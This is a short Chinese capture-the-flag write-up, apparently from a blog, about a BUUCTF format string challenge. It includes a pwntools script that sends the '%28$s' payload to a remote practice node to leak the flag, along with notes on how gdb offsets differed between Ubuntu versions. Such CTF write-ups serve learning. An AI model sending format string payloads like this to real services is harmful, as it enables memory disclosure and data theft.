这题本身比较简单,但是增强了一丝丝漏洞意识

看到flag在文中又看到printf显然想到格式化字符串漏洞泄露内存,,,
关键是计算偏移:这里我再次分别利用ubuntu21 和ubuntu 16都gdb调试了一下,发现ubuntu21的调试偏移计算结果不一样,,,,,离谱之。
from pwn import*
p=remote('node4.buuoj.cn',28336)
payload="%28$s"
p.sendlineafter("flag >>",payload)
p.interactive()
本文介绍了一个简单的格式化字符串漏洞实例,通过分析发现flag并利用printf函数泄露内存的方法。关键在于计算不同Ubuntu版本下gdb调试时的偏移量差异。
589

被折叠的 条评论
为什么被折叠?



